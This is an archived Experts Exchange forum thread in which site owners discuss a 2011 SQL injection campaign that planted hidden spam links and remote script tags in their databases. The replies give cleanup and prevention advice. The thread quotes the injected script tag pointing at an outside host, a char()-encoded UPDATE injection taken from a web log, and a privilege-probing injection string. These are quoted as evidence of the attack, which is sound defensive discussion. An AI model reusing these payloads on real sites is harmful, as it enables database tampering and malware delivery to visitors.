What's causing "file-dl.com"-link hack?

Look at this:

A lot of sites that have been hacked with the same hidden link to file-dl.com

What's causing this? How do they do it? How to prevent it?

Who is Participating?
jdcraneConnect With a Mentor Commented:
</title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=2 >crack</a>
</title><script src=http://dfrgcc.com/ur.php></script>

Open in new window

There are a few things you'd need to do in order to rid yourself of the above permanently. They are:


if you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline


review yours logs to determine where the attack vector was, eg url querystring etc, it's ok if you can't see anything


review your code in detail and resolve the vulnerabilities, the location of the injected content will assist with determining where the vulnerabilities are in your application


repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred


put your site(s) back online
<advertising link removed by RockMod 20 Sept '11>
Same question here. I appreciate a quick answer !!
Having problem with one SQL 2008 server, this server is not public accesible . Only some limited range of server can access this. Not all the servers are our server...

Can you tell what your environment is ?
AlfahaneAuthor Commented:
SQL 2000
Will You Be GDPR Compliant by 5/28/2018?

GDPR? That's a regulation for the European Union. But, if you collect data from customers or employees within the EU, then you need to know about GDPR and make sure your organization is compliant by May 2018. Check out our preparation checklist to make sure you're on track today!

AlfahaneAuthor Commented:
Do you have problems with several databases on one server only?
only one database on one server. The server has 50 databases.
The database is accessed from outside. But dont know for sure it is the external user that cause this injection or our servers.
I think (and hope) it is not one of our servers that is injecting. But i want to be sure .....
Hi guys

it'll be a simple injection attack that's gotten past one of your web facing applications linking to the affected databases.. i've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, i can repair the data for you fairly quickly... just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well so this particular issue won't happen again.

All the best :)
Been having the same issue for 2 days.  Not only seeing this in a sql2008 database but is adding it to files being written on our web server.   Need Help!
in addition to repairing, i can set your system up to provide an immediate report via email.. some of the key things it shows are:
the attack vector (what part of your application the attacker was trying to attack),
the source ip,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding url
here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:

Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x

Open in new window

A websiteof mine has been affected by this issue. I stored the datbase and ensured that ONLY parameterised queries used throughout the website.

Today the website has been targetted again, this time with:
</title><script src=http://dfrgcc.com/ur.php></script>

There is no relevant information in the event log. Does anyone know what is causing this?
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.

For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the lisamoon hack a few months ago.

As you can see the querystring contains ASCII characters to disguise the query.

I have used a parametrised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the sqlcommand is run against the database, this does not prevent the hack.

Any ideas?
jdcraneConnect With a Mentor Commented:
deploy a test version of your site and debug the same request.. i think you'll find that if this was in fact the successful injection that corrupted your system that you can't be vetting the querystring properly, also depending on how you parameterised the query or sp, it may not protect you from injection.. if databasetablename and nameofclient are literals, they have to be retrieved from somewhere, otherwise it's a remarkably accurate guess (ie you were targeted).. might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow up injections like the above
lherrouConnect With a Mentor Commented:
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc to give them access again.
Would it improve matters if you restricted the number of characters in the qs parameter? IE your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.
jdcraneConnect With a Mentor Commented:
if you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (eg int,intval) not the parameter directly.

if you're expecting a non numeric string literal, it's best to be fishing for sql injection symbols and halting further action upon detection of suspicious activity. if you can't post source and sample querystrings,
your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection,
AlfahaneAuthor Commented:
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than review our programming code more and hope that next clever hack will not come too soon.
All Courses

From novice to tech pro — start learning today.